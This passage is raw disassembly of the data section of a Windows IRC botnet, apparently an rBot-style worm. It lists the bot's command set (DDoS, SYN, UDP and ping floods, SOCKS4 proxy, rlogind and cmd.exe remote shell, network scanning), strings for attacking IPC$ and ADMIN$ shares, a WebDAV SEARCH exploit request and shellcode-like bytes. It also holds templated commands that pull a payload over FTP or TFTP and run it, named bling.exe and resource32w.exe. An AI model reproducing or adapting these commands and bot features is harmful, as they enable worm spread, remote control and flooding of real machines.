aDrv db 'drv',0 ; DATA XREF: sub_409848+133C�o
aDriveinfo db 'driveinfo',0 ; DATA XREF: sub_409848+1328�o
align 4
aUp db 'up',0 ; DATA XREF: sub_409848+1314�o
; sub_409848+248C�o
align 10h
aUptime db 'uptime',0 ; DATA XREF: sub_409848+1300�o
align 4
aPs db 'ps',0 ; DATA XREF: sub_409848+12EC�o
align 4
aProcs db 'procs',0 ; DATA XREF: sub_409848+12D8�o
align 4
aErradicate db 'erradicate',0 ; DATA XREF: sub_409848+12C4�o
align 10h
aDestroy db 'destroy',0 ; DATA XREF: sub_409848+12B0�o
aSi db 'si',0 ; DATA XREF: sub_409848+129C�o
align 4
aSysinfo db 'sysinfo',0 ; DATA XREF: sub_409848+1288�o
aNi db 'ni',0 ; DATA XREF: sub_409848+1274�o
align 4
aNetinfo db 'netinfo',0 ; DATA XREF: sub_409848+1260�o
aClg db 'clg',0 ; DATA XREF: sub_409848+124C�o
aClearlog db 'clearlog',0 ; DATA XREF: sub_409848+1238�o
align 10h
aLg db 'lg',0 ; DATA XREF: sub_409848+1224�o
align 4
aLog_0 db 'log',0 ; DATA XREF: sub_409848+1210�o
aAl db 'al',0 ; DATA XREF: sub_409848+11FC�o
align 4
aAliases db 'aliases',0 ; DATA XREF: sub_409848+11E8�o
aT: ; DATA XREF: sub_409848+11D4�o
unicode 0, <t>,0
aThreads db 'threads',0 ; DATA XREF: sub_409848+11C0�o
aMainFailedToRe db '[MAIN]: Failed to reboot system.',0 ; DATA XREF: sub_409848+1188�o
align 4
aMainRebootingS db '[MAIN]: Rebooting system.',0 ; DATA XREF: sub_409848+1181�o
align 10h
aReboot db 'reboot',0 ; DATA XREF: sub_409848+116E�o
align 4
aI_0: ; DATA XREF: sub_409848+115A�o
unicode 0, <i>,0
aId db 'id',0 ; DATA XREF: sub_409848+1146�o
align 10h
aS_8: ; DATA XREF: sub_409848+1132�o
unicode 0, <s>,0
aStatus db 'status',0 ; DATA XREF: sub_409848+111E�o
align 4
aQ: ; DATA XREF: sub_409848+110A�o
unicode 0, <q>,0
aQuit_0 db 'quit',0 ; DATA XREF: sub_409848+10F6�o
align 4
aDc db 'dc',0 ; DATA XREF: sub_409848+10E2�o
align 4
aDisconnect db 'disconnect',0 ; DATA XREF: sub_409848+10CE�o
align 4
aR: ; DATA XREF: sub_409848+10BA�o
; sub_409848+190D�o ...
unicode 0, <r>,0
aReconnect db 'reconnect',0 ; DATA XREF: sub_409848+10A6�o
align 4
aStats db 'stats',0 ; DATA XREF: sub_409848+1092�o
align 10h
aScanstats db 'scanstats',0 ; DATA XREF: sub_409848+107E�o
align 4
aScan_0 db '[SCAN]',0 ; DATA XREF: sub_409848+1070�o
; sub_409848+5E67�o
align 4
aScan_1 db 'Scan',0 ; DATA XREF: sub_409848+106B�o
align 4
aScanstop db 'scanstop',0 ; DATA XREF: sub_409848+1056�o
align 4
aSecure_1 db '[SECURE]',0 ; DATA XREF: sub_409848+1048�o
align 4
aSecure_0 db 'Secure',0 ; DATA XREF: sub_409848+1043�o
align 4
aSecurestop db 'securestop',0 ; DATA XREF: sub_409848+102E�o
align 4
aClones db '[CLONES]',0 ; DATA XREF: sub_409848+1020�o
align 4
aClone db 'Clone',0 ; DATA XREF: sub_409848+101B�o
align 4
aClonestop db 'clonestop',0 ; DATA XREF: sub_409848+1006�o
align 4
aPsstop db 'psstop',0 ; DATA XREF: sub_409848+FF2�o
align 10h
aProcsstop db 'procsstop',0 ; DATA XREF: sub_409848+FDE�o
align 4
aFfstop db 'ffstop',0 ; DATA XREF: sub_409848+FCA�o
align 4
aFindfilestop db 'findfilestop',0 ; DATA XREF: sub_409848+FB6�o
align 4
aTftp_0 db '[TFTP]',0 ; DATA XREF: sub_409848+FA8�o
align 4
aTftpstop db 'tftpstop',0 ; DATA XREF: sub_409848+F8E�o
align 4
aPing_1 db '[PING]',0 ; DATA XREF: sub_409848+F80�o
align 10h
aPingFlood db 'Ping flood',0 ; DATA XREF: sub_409848+F7B�o
align 4
aPingstop db 'pingstop',0 ; DATA XREF: sub_409848+F66�o
align 4
aUpd db '[UPD]',0 ; DATA XREF: sub_409848+F58�o
align 10h
aUdpFlood db 'UDP flood',0 ; DATA XREF: sub_409848+F53�o
align 4
aUdpstop db 'udpstop',0 ; DATA XREF: sub_409848+F3E�o
aSyn_0 db '[SYN]',0 ; DATA XREF: sub_409848+F30�o
align 4
aSynFlood db 'Syn flood',0 ; DATA XREF: sub_409848+F2B�o
align 4
aSynstop db 'synstop',0 ; DATA XREF: sub_409848+F16�o
aDdos db '[DDoS]',0 ; DATA XREF: sub_409848+F08�o
align 4
aDdosFlood db 'DDoS flood',0 ; DATA XREF: sub_409848+F03�o
align 4
aDdos_stop db 'ddos.stop',0 ; DATA XREF: sub_409848+EEE�o
align 10h
aRedirect_0 db '[REDIRECT]',0 ; DATA XREF: sub_409848+EE0�o
align 4
aTcpRedirect db 'TCP redirect',0 ; DATA XREF: sub_409848+EDB�o
align 4
aRedirectstop db 'redirectstop',0 ; DATA XREF: sub_409848+EC6�o
align 4
aLog db '[LOG]',0 ; DATA XREF: sub_409848+EB8�o
align 4
aLogList db 'Log list',0 ; DATA XREF: sub_409848+EB3�o
align 10h
aLogstop db 'logstop',0 ; DATA XREF: sub_409848+E9E�o
aHttpd db '[HTTPD]',0 ; DATA XREF: sub_409848+E90�o
aHttpstop db 'httpstop',0 ; DATA XREF: sub_409848+E76�o
align 4
aRlogind db '[RLOGIND]',0 ; DATA XREF: sub_409848+E68�o
align 4
aRloginstop db 'rloginstop',0 ; DATA XREF: sub_409848+E4E�o
align 4
aSocks4_0 db '[SOCKS4]',0 ; DATA XREF: sub_409848+E40�o
align 10h
aServer_0 db 'Server',0 ; DATA XREF: sub_409848+E3B�o
; sub_409848+E63�o ...
align 4
aSocks4stop db 'socks4stop',0 ; DATA XREF: sub_409848+E26�o
align 4
aS4 db 's4',0 ; DATA XREF: sub_409848+E12�o
align 4
aSocks4 db 'socks4',0 ; DATA XREF: sub_409848+DFE�o
align 10h
aUnsec db 'unsec',0 ; DATA XREF: sub_409848+DEA�o
align 4
aUnsecure db 'unsecure',0 ; DATA XREF: sub_409848+DD6�o
align 4
aSec db 'sec',0 ; DATA XREF: sub_409848+DC2�o
; sub_409848+5416�o
aSecure db 'secure',0 ; DATA XREF: sub_409848+DAE�o
; sub_409848+5406�o
align 10h
aVer db 'ver',0 ; DATA XREF: sub_409848+D9A�o
aVersion db 'version',0 ; DATA XREF: sub_409848+D86�o
aLo db 'lo',0 ; DATA XREF: sub_409848+D72�o
align 10h
aLogout db 'logout',0 ; DATA XREF: sub_409848+D5E�o
align 4
aD: ; DATA XREF: sub_409848+D4A�o
; sub_415F00+7A�o
unicode 0, <d>,0
aDie db 'die',0 ; DATA XREF: sub_409848+D36�o
aRn db 'rn',0 ; DATA XREF: sub_409848+D22�o
align 4
aRndnick db 'rndnick',0 ; DATA XREF: sub_409848+D0B�o
a63 db '63',0 ; DATA XREF: sub_409848+BEA�o
align 10h
asc_42A850: ; DATA XREF: sub_409848+BC2�o
unicode 0, <)>,0
aChr db '$chr(',0 ; DATA XREF: sub_409848+B87�o
align 4
aServer_1 db '$server',0 ; DATA XREF: sub_409848+B7C�o
aRndnick_0 db '$rndnick',0 ; DATA XREF: sub_409848+B6B�o
align 10h
aChan db '$chan',0 ; DATA XREF: sub_409848+B4D�o
align 4
aUser_2 db '$user',0 ; DATA XREF: sub_409848+B3C�o
align 10h
aMe db '$me',0 ; DATA XREF: sub_409848+B2A�o
aD_0 db '$%d',0 ; DATA XREF: sub_409848+ABE�o
aD_1 db '$%d-',0 ; DATA XREF: sub_409848+A0B�o
align 10h
dword_42A890 dd 49544F4Eh, 25204543h, 13A2073h, 474E4950h, 1732520h
; DATA XREF: sub_409848+971�o
dd 0A0Dh
dword_42A8A8 dd 4E495001h, 47hdword_42A8B0 dd 49544F4Eh, 25204543h, 13A2073h, 53524556h, 204E4F49h
; DATA XREF: sub_409848+934�o
dd 0D017325h, 0Ah
dword_42A8CC dd 52455601h, 4E4F4953h, 1dword_42A8D8 dd 23h dword_42A8DC dd 6Ch dword_42A8E0 dd 323333h ; sub_409848+7EC�o ...
aMainJoinedChan db '[MAIN]: Joined channel: %s.',0 ; DATA XREF: sub_409848+6F0�o
aMainUserSLog_0 db '[MAIN]: User: %s logged out.',0 ; DATA XREF: sub_409848+690�o
align 10h
a353 db '353',0 ; DATA XREF: sub_409848+63E�o
aPart db 'PART',0 ; DATA XREF: sub_409848+5C2�o
align 4
aSS_3 db ':%s%s',0 ; DATA XREF: sub_409848+593�o
align 4
aNick db 'NICK',0 ; DATA XREF: sub_409848+3E4�o
align 4
aNoticeSS db 'NOTICE %s :%s',0Dh,0Ah,0 ; DATA XREF: sub_409848+370�o
; sub_409848+6CE�o
aMainUserSLogge db '[MAIN]: User %s logged out.',0 ; DATA XREF: sub_409848+357�o
; sub_409848+5554�o ...
aKick db 'KICK',0 ; DATA XREF: sub_409848+2D7�o
align 10h
aNickS_0 db 'NICK %s',0Dh,0Ah,0 ; DATA XREF: sub_409848+26E�o
; sub_409848+4375�o ...
align 4
a433 db '433',0 ; DATA XREF: sub_409848+24B�o
a@: ; DATA XREF: sub_409848+222�o
unicode 0, <@>,0
a302 db '302',0 ; DATA XREF: sub_409848+215�o
a005 db '005',0 ; DATA XREF: sub_409848+202�o
a001 db '001',0 ; DATA XREF: sub_409848+1EF�o
aJoinSS_0 db 'JOIN %s %s',0Dh,0Ah,0 ; DATA XREF: sub_409848+1D2�o
; sub_409848+3835�o ...
align 10h
aPongS db 'PONG %s',0Dh,0Ah,0 ; DATA XREF: sub_409848+1B0�o
align 4
aPing db 'PING',0 ; DATA XREF: sub_409848+19A�o
align 4
asc_42A9B4: ; DATA XREF: sub_409848+188�o
; sub_409848+611B�o
unicode 0, <!>,0
aSecureSystemSe db '[SECURE]: System secure monitor active.',0 ; DATA XREF: sub_40FB4C+38F�o
aMainBotStarted db '[MAIN]: Bot started.',0 ; DATA XREF: sub_40FB4C+356�o
align 4
aSDS db '%s %d "%s"',0 ; DATA XREF: sub_40FB4C+286�o
align 4
aRedirectFail_0 db '[REDIRECT]: Failed to start connection thread, error: <%d>.',0
; DATA XREF: sub_410142+153�o
aRedirectClient db '[REDIRECT]: Client connection to IP: %s:%d, Server thread: %d.',0
; DATA XREF: sub_410142+DB�o
align 10h
aRedirectFail_1 db '[REDIRECT]: Failed to start client thread, error: <%d>.',0
; DATA XREF: sub_41031F+13F�o
aRedirectClie_0 db '[REDIRECT]: Client connection from IP: %s:%d, Server thread: %d.',0
; DATA XREF: sub_41031F+DD�o
align 4
aPrivmsgSS db 'PRIVMSG %s :%s',0Dh,0 ; DATA XREF: sub_41050E+35�o
aCmdCouldNotR_0 db '[CMD]: Could not read data from proccess.',0Dh,0Ah,0
; DATA XREF: sub_41059C:loc_410700�o
aCmdProccessHas db '[CMD]: Proccess has terminated.',0Dh,0Ah,0 ; DATA XREF: sub_41059C+141�o
align 4
aCmdCouldNotRea db '[CMD]: Could not read data from proccess',0Dh,0Ah,0
; DATA XREF: sub_41059C:loc_4106AB�o
align 4
aCmdFailedToSta db '[CMD]: Failed to start IO thread, error: <%d>.',0
; DATA XREF: sub_410729+18E�o
align 4
aCmdRemoteComma db '[CMD]: Remote Command Prompt',0 ; DATA XREF: sub_410729+146�o
align 4
aCmd_exe db 'cmd.exe',0 ; DATA XREF: sub_410729+1F�o
aRlogindProtoco db '[RLOGIND]: Protocol string too long.',0
; DATA XREF: sub_4108D8:loc_41090A�o
align 4
aRlogindLoginRe db '[RLOGIND]: Login rejected, Remote user: <%s@%s>.',0
; DATA XREF: sub_410923+39�o
align 4
aRlogindUserL_0 db '[RLOGIND]: User logged out: <%s@%s>.',0 ; DATA XREF: sub_410970+1EF�o
align 4
aRlogindErrorSe db '[RLOGIND]: Error: SessionRun(): <%d>.',0 ; DATA XREF: sub_410970+1CF�o
align 4
aRlogindUserLog db '[RLOGIND]: User logged in: <%s@%s>.',0 ; DATA XREF: sub_410970+1AF�o
aPermissionDeni db 'Permission denied',0Ah,0 ; DATA XREF: sub_410970+184�o
align 4
aRlogindErrorGe db '[RLOGIND]: Error: getpeername(): <%d>.',0 ; DATA XREF: sub_410970+F4�o
align 4
aRlogindError_0 db '[RLOGIND]: Error: server failed, returned: <%d>.',0
; DATA XREF: sub_410B7C+215�o
align 10h
aRlogindFaile_1 db '[RLOGIND]: Failed to start client thread, error: <%d>.',0
; DATA XREF: sub_410B7C+1C9�o
align 4
aRlogindClientC db '[RLOGIND]: Client connection from IP: %s:%d, Server thread: %d.',0
; DATA XREF: sub_410B7C+158�o
aRlogindReadyAn db '[RLOGIND]: Ready and waiting for incoming connections.',0
; DATA XREF: sub_410B7C+FF�o
align 10h
aRlogindFaile_0 db '[RLOGIND]: Failed to install control-C handler, error: <%d>.',0
; DATA XREF: sub_410B7C+70�o
align 10h
aRlogindErrorWs db '[RLOGIND]: Error: WSAStartup(): <%d>.',0 ; DATA XREF: sub_410B7C+3E�o
align 4
aSI db '%s%i',0 ; DATA XREF: sub_410DF8+40�o
; .text:00410EF3�o ...
align 10h
aPc db 'PC',0 ; DATA XREF: .text:00410EC1�o
align 4
aS_6 db '[%s]',0 ; DATA XREF: .text:00411029�o
align 4
a??? db '???',0 ; DATA XREF: .text:loc_411020�o
; sub_412B6A:loc_412C0B�o
a2k3 db '2K3',0 ; DATA XREF: .text:00411019�o
aXp_0 db 'XP',0 ; DATA XREF: .text:0041100E�o
; sub_412B6A+8B�o
align 4
a2k db '2K',0 ; DATA XREF: .text:00411001�o
; sub_412B6A+7C�o
align 4
aMe_0 db 'ME',0 ; DATA XREF: .text:00410FEE�o
; sub_412B6A+68�o
align 10h
a98 db '98',0 ; DATA XREF: .text:00410FE1�o
; sub_412B6A+59�o
align 4
aNt db 'NT',0 ; DATA XREF: .text:00410FD4�o
; sub_412B6A+4A�o
align 4
a95 db '95',0 ; DATA XREF: .text:00410FC9�o
; sub_412B6A+39�o
align 4
aDS db '[%d]%s',0 ; DATA XREF: sub_411072+3A�o
align 4
aM_0 db '[M]',0 ; DATA XREF: sub_411072+2C�o
; sub_411072+51�o
aScanIpSPortD_0 db '[SCAN]: IP: %s Port: %d is open.',0 ; DATA XREF: sub_4111A1+85�o
align 4
aScanScanningIp db '[SCAN]: Scanning IP: %s, Port: %d.',0 ; DATA XREF: sub_411263+40�o
align 10h
aD_2 db 'D:\',0 ; DATA XREF: .text:0043024C�o
aD_3 db 'D$',0 ; DATA XREF: .text:00430248�o
align 4
aC_2 db 'C:\',0 ; DATA XREF: .text:00430244�o
aC_3 db 'C$',0 ; DATA XREF: .text:00430240�o
align 10h
aAdmin_0 db 'ADMIN$',0 ; DATA XREF: .text:00430238�o
align 4
aIpc_0 db 'IPC$',0 ; DATA XREF: .text:off_430230�o
align 10h
aSecureNetapi32 db '[SECURE]: Netapi32.dll couldn',27h,'t be loaded.',0
; DATA XREF: sub_411329+2E8�o
; sub_411650+2DA�o
align 4
aSecureNetworkS db '[SECURE]: Network shares deleted.',0 ; DATA XREF: sub_411329+2D2�o
align 10h
aSecureFailed_4 db '[SECURE]: Failed to delete ',27h,'%S',27h,' share.',0
; DATA XREF: sub_411329:loc_411594�o
align 4
aSecureShareS_0 db '[SECURE]: Share ',27h,'%S',27h,' deleted.',0
; DATA XREF: sub_411329+264�o
align 4
aSecureFailed_3 db '[SECURE]: Failed to delete ',27h,'%s',27h,' share.',0
; DATA XREF: sub_411329:loc_411504�o
align 10h
aSecureShareSDe db '[SECURE]: Share ',27h,'%s',27h,' deleted.',0
; DATA XREF: sub_411329+1D4�o
align 10h
aSecureAdvapi32 db '[SECURE]: Advapi32.dll couldn',27h,'t be loaded.',0
; DATA XREF: sub_411329:loc_41145C�o
; sub_411650:loc_41177F�o
align 4
aSecureFailed_2 db '[SECURE]: Failed to open IPC$ Restriction registry key.',0
; DATA XREF: sub_411329:loc_411455�o
aSecureRestrict db '[SECURE]: Restricted access to the IPC$ Share.',0
; DATA XREF: sub_411329:loc_41143D�o
align 4
aSecureFailed_1 db '[SECURE]: Failed to restrict access to the IPC$ Share.',0
; DATA XREF: sub_411329+10D�o
align 4
aRestrictanonym db 'restrictanonymous',0 ; DATA XREF: sub_411329+EE�o
; sub_411650+EE�o
align 10h
aSecureFailed_0 db '[SECURE]: Failed to open DCOM registry key.',0
; DATA XREF: sub_411329+92�o
; sub_411650+92�o
aSecureDcomDisa db '[SECURE]: DCOM disabled.',0 ; DATA XREF: sub_411329:loc_41139D�o
align 4
aSecureDisableD db '[SECURE]: Disable DCOM failed.',0 ; DATA XREF: sub_411329+6D�o
align 4
aEnabledcom db 'EnableDCOM',0 ; DATA XREF: sub_411329+55�o
; sub_411650+55�o
align 4
aSecureNetwor_0 db '[SECURE]: Network shares added.',0 ; DATA XREF: sub_411650+2C2�o
aC_0 db '%c:\',0 ; DATA XREF: sub_411650+22C�o
align 4
aC_1 db '%c$',0 ; DATA XREF: sub_411650+21B�o
aSecureFailed_7 db '[SECURE]: Failed to add ',27h,'%s',27h,' share.',0
; DATA XREF: sub_411650:loc_4117FE�o
; sub_411650:loc_4118C5�o
aSecureShareSAd db '[SECURE]: Share ',27h,'%s',27h,' added.',0 ; DATA XREF: sub_411650+1A7�o
; sub_411650+26E�o
aSecureFailed_6 db '[SECURE]: Failed to open IPC$ restriction registry key.',0
; DATA XREF: sub_411650:loc_411778�o
aSecureUnrestri db '[SECURE]: Unrestricted access to the IPC$ Share.',0
; DATA XREF: sub_411650:loc_411760�o
align 4
aSecureFailed_5 db '[SECURE]: Failed to unrestrict access to the IPC$ Share.',0
; DATA XREF: sub_411650+109�o
align 4
aSecureDcomEnab db '[SECURE]: DCOM enabled.',0 ; DATA XREF: sub_411650:loc_4116C4�o
aSecureEnableDc db '[SECURE]: Enable DCOM failed.',0 ; DATA XREF: sub_411650+6D�o
align 10h
aRlogindFaile_2 db '[RLOGIND]: Failed to execute shell, error: <%d>.',0
; DATA XREF: sub_4119DF+B7�o
align 4
aCmdQ db 'cmd /q',0 ; DATA XREF: sub_4119DF+80�o
align 4
aRlogindSession db '[RLOGIND]: SessionReadShellThread exited, error: <%ld>.',0
; DATA XREF: sub_411AAB+89�o
aRlogindFaile_5 db '[RLOGIND]: Failed to execute shell.',0 ; DATA XREF: sub_411C5D+B2�o
aRlogindFaile_4 db '[RLOGIND]: Failed to create shell stdin pipe, error: <%d>.',0
; DATA XREF: sub_411C5D+82�o
align 4
aRlogindFaile_3 db '[RLOGIND]: Failed to create shell stdout pipe, error: <%d>.',0
; DATA XREF: sub_411C5D+5F�o
aRlogindWaitfor db '[RLOGIND]: WaitForMultipleObjects error: <%d>.',0
; DATA XREF: sub_411D59+E2�o
align 10h
aRlogindFaile_6 db '[RLOGIND]: Failed to create ReadShell session thread, error: <%d>'
; DATA XREF: sub_411D59+59�o
; sub_411D59+8F�o
db '.',0
align 4
aSocks4ErrorF_0 db '[SOCKS4]: Error: Failed to connect to target, returned: <%d>.',0
; DATA XREF: sub_41225E+1A7�o
align 4
aSocks4ErrorFai db '[SOCKS4]: Error: Failed to open socket(), returned: <%d>.',0
; DATA XREF: sub_41225E+187�o
align 10h
aSocks4Authenti db '[SOCKS4]: Authentication failed. Remote userid: %s != %s.',0
; DATA XREF: sub_41225E+F6�o
align 4
aSocks4Failed_1 db '[SOCKS4]: Failed to start server on Port %d.',0
; DATA XREF: sub_41248E+1A1�o
align 4
aSocks4Failed_0 db '[SOCKS4]: Failed to start client thread, error: <%d>.',0
; DATA XREF: sub_41248E+16C�o
align 4
aSocks4ClientCo db '[SOCKS4]: Client connection from IP: %s:%d, Server thread: %d.',0
; DATA XREF: sub_41248E+107�o
align 4
aSynSendErrorD_ db '[SYN]: Send error: <%d>.',0 ; DATA XREF: sub_41267A+242�o
align 10h
aSynDoneWithFlo db '[SYN]: Done with flood (%iKB/sec).',0 ; DATA XREF: sub_41294E+48�o
align 4
aDdDhDm db '%dd %dh %dm',0 ; DATA XREF: sub_4129E9+39�o
aSysinfoCpuI64u db '[SYSINFO]: [CPU]: %I64uMHz. [RAM]: %sKB total, %sKB free. [Disk]:'
; DATA XREF: sub_412B6A+247�o
db ' %s total, %s free. [OS]: Windows %s (%d.%d, Build %d). [Sysdir]:'
db ' %s. [Hostname]: %s (%s). [Current User]: %s. [Date]: %s. [Time]:'
db ' %s. [Uptime]: %s.',0
align 4
aDdMmmYyyy db 'dd:MMM:yyyy',0 ; DATA XREF: sub_412B6A+161�o
aCouldnTResolve db 'couldn',27h,'t resolve host',0 ; DATA XREF: sub_412B6A:loc_412C9D�o
align 4
aSS_5 db '%s (%s)',0 ; DATA XREF: sub_412B6A+C0�o
aNetinfoTypeSS_ db '[NETINFO]: [Type]: %s (%s). [IP Address]: %s. [Hostname]: %s.',0
; DATA XREF: sub_412DD1+99�o
align 4
off_42B6D4 dd offset loc_412F4C+2 ; DATA XREF: sub_412DD1+67�o
dword_42B6D8 dd 4E414Ch dword_42B6DC dd 6C616944h, 70752Dhdword_42B6E4 dd 20746F4Eh, 6E6E6F63h, 65746365h, 64h, 0aTcpErrorSendin db '[TCP]: Error sending packets to IP: %s. Packets sent: %d. Returne'
; DATA XREF: sub_412E87+3C5�o
db 'd: <%d>.',0
align 8
aTcpDoneWithSFl db '[TCP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/se'
; DATA XREF: sub_412E87+35B�o
db 'c (%dMB).',0
align 4
aTcpInvalidTarg db '[TCP]: Invalid target IP.',0 ; DATA XREF: sub_412E87+CB�o
align 10h
aTcpErrorSetsoc db '[TCP]: Error: setsockopt() failed, returned: <%d>.',0
; DATA XREF: sub_412E87+AC�o
align 4
aTcpErrorSocket db '[TCP]: Error: socket() failed, returned: <%d>.',0
; DATA XREF: sub_412E87+67�o
align 4
dword_42B814 dd 4000500h, 7868746Bh, 0aTftpFileTran_0 db '[TFTP]: File transfer complete to IP: %s (%s).',0
; DATA XREF: sub_41326A+44C�o
align 10h
aTftpFileNotFou db '[TFTP]: File not found: %s (%s).',0 ; DATA XREF: sub_41326A+395�o
align 4
dword_42B874 dd 1000500h, 656C6946h, 746F4E20h, 756F4620h, 646Eh
; DATA XREF: sub_41326A+379�o
aTftpFileTransf db '[TFTP]: File transfer started to IP: %s (%s).',0
; DATA XREF: sub_41326A+324�o
align 4
aTftpFailedToOp db '[TFTP]: Failed to open file: %s.',0 ; DATA XREF: sub_41326A+14D�o
align 4
aTftpErrorSocke db '[TFTP]: Error: socket() failed, returned: <%d>.',0
; DATA XREF: sub_41326A+6C�o
aOctet db 'octet',0 ; DATA XREF: sub_41326A+11�o
align 4
aThreadList db '-[Thread List]-',0 ; DATA XREF: sub_41379D+10�o
aSNoSThreadFoun db '%s: No %s thread found.',0 ; DATA XREF: sub_413968+51�o
aSSStopped_DThr db '%s: %s stopped. (%d thread(s) stopped.)',0 ; DATA XREF: sub_413968+35�o
aVisitFailedToG db '[VISIT]: Failed to get requested URL from HTTP server.',0
; DATA XREF: sub_413A7D:loc_413C19�o
align 4
aVisitUrlVisite db '[VISIT]: URL visited.',0 ; DATA XREF: sub_413A7D+195�o
align 4
aVisitFailedToC db '[VISIT]: Failed to connect to HTTP server.',0
; DATA XREF: sub_413A7D+17F�o
align 10h
aVisitCouldNotO db '[VISIT]: Could not open a connection.',0 ; DATA XREF: sub_413A7D+150�o
align 4
aVisitInvalidUr db '[VISIT]: Invalid URL.',0 ; DATA XREF: sub_413A7D+AB�o
align 10h
asc_42BA20 db '*/*',0 ; DATA XREF: sub_413A7D+68�o
aSExploitingIpS db '[%s]: Exploiting IP: %s.',0 ; DATA XREF: sub_413C88+2B8�o
; .text:0041487F�o ...
align 10h
aHostSContentTy db 'Host: %s',0Dh,0Ah ; DATA XREF: sub_413C88+1BA�o
db 'Content-Type: text/xml',0Dh,0Ah
db 'Content-Length: %d',0Dh,0Ah
db 0Dh,0Ah,0
align 4
aHttp1_1 db ' HTTP/1.1',0Dh,0Ah,0 ; DATA XREF: sub_413C88+183�o
aSearch db 'SEARCH /',0 ; DATA XREF: sub_413C88+CC�o
align 4
dword_42BA94 dd 0 asc_42BA98: ; DATA XREF: sub_414199+17�o
; sub_414277+17�o
unicode 0, <\\>,0
align 10h
aIpc: ; DATA XREF: sub_414199+C�o
; sub_414277+C�o
unicode 0, <\IPC$>,0
aTftpFileTran_1 db '[TFTP]: File transfer complete to IP: %s',0 ; DATA XREF: .text:00414832�o
; .text:00414A65�o
align 4
aSPipeEpmapper db '\\%s\pipe\epmapper',0 ; DATA XREF: .text:004145DD�o
align 10h
aEchoOpenSDOEch db 'echo open %s %d > o&echo user 1 1 >> o &echo get bling.exe >> o &'
; DATA XREF: .text:00414CFF�o
db 'echo quit >> o &ftp -n -s:o &bling.exe',0Dh,0Ah,0
align 4
aTftpISGetS db 'tftp -i %s get %s',0Dh,0Ah,0 ; DATA XREF: .text:00414CD5�o
aNilsisgay db 'NILSISGAY!!',0 ; DATA XREF: .text:00414BA6�o
; ---------------------------------------------------------------------------
loc_42BB7C: ; DATA XREF: .text:00414B93�o
jmp short loc_42BB8D
; ---------------------------------------------------------------------------
align 10h
dword_42BB80 dd 2016280h, 100BDh, 8F160001h db 82h
; ---------------------------------------------------------------------------
loc_42BB8D: ; CODE XREF: .text:loc_42BB7C�j
add [eax], eax
; ---------------------------------------------------------------------------
db 0
dd 0
dword_42BB94 dd 255C3A63h, 78652E73h, 65haEchoOpenSDOE_0 db 'echo open %s %d>o&echo USER a>>o&echo a>>o&echo binary>>o&echo ge'
; DATA XREF: sub_415175+8B�o
; .text:00415E25�o
db 't resource32w.exe>>o&echo quit>>o&ftp -n -s:o&del o&resource32w.e'
db 'xe',0Dh,0Ah,0
align 4
aSIpc db '\\%s\ipc$',0 ; DATA XREF: sub_4152B5+27�o
; .text:004158EE�o
align 4
dword_42BC34 dd 1CEC8166h ; .text:0041589A�r
dword_42BC38 dd 0E4FF07h ; .text:004158A4�r
aSTryingToXploi db '[%s]: Trying to Xploit IP: %s.',0 ; DATA XREF: .text:00415E9C�o
align 4
aSExploitingI_0 db '[%s]: Exploiting IP: %s, Share: \%s, User: (%s/%s)',0
; DATA XREF: sub_415F00+206�o
align 10h
aNoPassword db '(no password)',0 ; DATA XREF: sub_415F00+1E4�o
align 10h
aSSS_3 db '%s\%s\%s',0 ; DATA XREF: sub_415F00+CB�o
align 4
aCWindowsSystem db 'c$\windows\system32',0 ; DATA XREF: sub_415F00+6C�o
aCWinntSystem32 db 'c$\winnt\system32',0 ; DATA XREF: sub_415F00+65�o
align 4
aAdminSystem32 db 'Admin$\system32',0 ; DATA XREF: sub_415F00+5E�o
aSIpc_0 db '%s\ipc$',0 ; DATA XREF: .text:00416233�o
aS_5 db '\\%s',0 ; DATA XREF: .text:004161F5�o
align 4
a100m db '100',0Dh,0Ah,0 ; DATA XREF: .text:00416780�o
align 4
a001merrorExecu db '001Error Executing File',0Dh,0Ah,0 ; DATA XREF: .text:00416768�o
align 4
a008mcA_exe db '008C:\a.exe',0Dh,0Ah,0 ; DATA XREF: .text:00416737�o
align 4
aOkRcvd db '+OK RCVD',0 ; DATA XREF: .text:00416716�o
align 4
aOkRedy db '+OK REDY',0 ; DATA XREF: .text:004166AF�o
align 10h
aCA_exeD db 'C:\a.exe',0Dh,0Ah ; DATA XREF: .text:0041665F�o
db '%d',0Dh,0Ah,0
align 10h
a020m db '020',0Dh,0Ah,0 ; DATA XREF: .text:0041657A�o
align 4
a019m db '019',0Dh,0Ah,0 ; DATA XREF: .text:0041654D�o
align 10h
a022mmv1_2 db '022v1.2',0Dh,0Ah,0 ; DATA XREF: .text:loc_4164E8�o
a022mmv1_1 db '022v1.1',0Dh,0Ah,0 ; DATA XREF: .text:004164E1�o
a001m db '001',0 ; DATA XREF: .text:004164C4�o
; .text:00416534�o
align 10h
a001myourClient db '001Your client version is outdated!',0 ; DATA XREF: .text:00416486�o
align 4
a022moptestmv_0 db '022OPtestv1.2',0Dh,0Ah,0 ; DATA XREF: .text:loc_416434�o
align 4
a022moptestmv1_ db '022OPtestv1.1',0Dh,0Ah,0 ; DATA XREF: .text:0041642D�o
align 10h
stru_42BDD0 _msEH <0FFFFFFFFh, 0, offset sub_416D5A> ; DATA XREF: sub_416D07+2�o
align 10h
stru_42BDE0 _msEH <0FFFFFFFFh, 0, offset sub_416DE7> ; DATA XREF: sub_416D78+2�o
align 10h
stru_42BDF0 _msEH <0FFFFFFFFh, 0, offset sub_416EC3> ; DATA XREF: sub_416E7D+2�o
align 10h
stru_42BE00 _msEH <0FFFFFFFFh, 0, offset sub_416FF9> ; DATA XREF: sub_416FB7+2�o
align 10h
stru_42BE10 _msEH <0FFFFFFFFh, 0, offset sub_417163> ; DATA XREF: sub_417003+2�o
align 10h
stru_42BE20 _msEH <0FFFFFFFFh, 0, offset sub_417202> ; DATA XREF: sub_4171B0+2�o
align 10h
stru_42BE30 _msEH <0FFFFFFFFh, offset loc_417564, offset loc_417568>
; DATA XREF: sub_4174C6+2�o
align 10h
stru_42BE40 _msEH <0FFFFFFFFh, 0, offset sub_4178F8> ; DATA XREF: sub_4178A4+2�o
align 10h
stru_42BE50 _msEH <0FFFFFFFFh, 0, offset sub_418262> ; DATA XREF: sub_4181E7+2�o
aCorexitprocess db 'CorExitProcess',0 ; DATA XREF: sub_4182A9+F�o
align 4
aMscoree_dll db 'mscoree.dll',0 ; DATA XREF: sub_4182A9�o
stru_42BE78 _msEH <0FFFFFFFFh, 0, offset sub_418626> ; DATA XREF: sub_4185E7+2�o
; sub_418A1C+53�r
align 8
stru_42BE88 _msEH <0FFFFFFFFh, offset loc_41883B, offset loc_41884F>
